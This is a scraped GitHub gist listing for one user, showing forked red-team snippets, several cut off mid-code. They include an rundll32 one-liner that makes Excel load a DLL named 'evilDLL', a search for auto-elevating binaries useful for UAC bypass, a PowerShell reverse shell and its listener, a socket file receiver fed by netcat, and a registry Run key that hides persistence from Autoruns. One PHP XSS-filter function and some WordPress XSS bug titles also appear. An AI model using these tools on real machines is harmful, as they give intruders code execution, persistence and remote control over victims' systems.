Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
I may be slow to respond.

sasqwatch

💭
I may be slow to respond.
View GitHub Profile
@sasqwatch
sasqwatch / excel.bat
Created Apr 10, 2017 — forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
View excel.bat
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
@sasqwatch
sasqwatch / gist:9a84a57ab4536a631ce9cb8c9740ec56
Created Apr 13, 2017 — forked from dafthack/gist:8aa4ff60cd9352448a372ce1a7b2e27e
Easy Metasploit Install on Windows Subsystem for Linux
View gist:9a84a57ab4536a631ce9cb8c9740ec56
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux
1.) Enable Developer Mode
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1"
2.) Enable Windows Subsystem for Linux
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
3.) Reboot
@sasqwatch
sasqwatch / findelevate.py
Created May 25, 2017 — forked from riyazwalikar/findelevate.py
Python script to find all Windows binaries with autoElevate=True (uses sigcheck obviously)
View findelevate.py
# Usage: findelevate.py C:\Windows\System32\
# Needs sigcheck.exe in path [https://technet.microsoft.com/en-us/sysinternals/bb897441.aspx]
import sys
import os
import glob
import subprocess
if len(sys.argv) < 2:
print "Usage: findelevate.py <PATH>"
@sasqwatch
sasqwatch / receivefile.ps1
Created May 31, 2017 — forked from staaldraad/receivefile.ps1
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 192.168.1.7 8080```
View receivefile.ps1
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');
@sasqwatch
sasqwatch / mini-reverse.ps1
Created May 31, 2017 — forked from staaldraad/mini-reverse.ps1
A reverse shell in Powershell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
@sasqwatch
sasqwatch / mini-reverse-listener.ps1
Created May 31, 2017 — forked from staaldraad/mini-reverse-listener.ps1
A reverse shell listener in powershell
View mini-reverse-listener.ps1
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413);
if($socket -eq $null){
exit 1
}
$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
@sasqwatch
sasqwatch / test.reg
Created Jul 5, 2017 — forked from hasherezade/test.reg
Demo: persistence key not visible for sysinternals autoruns (in a default configuration - read more: https://twitter.com/hasherezade/status/849756054145699840)
View test.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
View XSS Protection in 5 common contexts
<?php
/**
* XSS protection function for HTML context only
* @usecases
* <title>use this function if output reflects here or as a content of any HTML tag.</title>
* e.g., <span>use this function if output reflects here</span>
* e.g., <div>use this function if output reflects here</div>
* @description
* Sanitize/Filter < and > so that attacker can not leverage them for JavaScript execution.
@sasqwatch
sasqwatch / wordpress2.md
Created Oct 19, 2017 — forked from cure53/wordpress2.md
WordPress SOME bug in plupload.flash.swf
View wordpress2.md
@sasqwatch
sasqwatch / wordpress.md
Created Oct 19, 2017 — forked from cure53/wordpress.md
WordPress Flash XSS in flashmediaelement.swf
View wordpress.md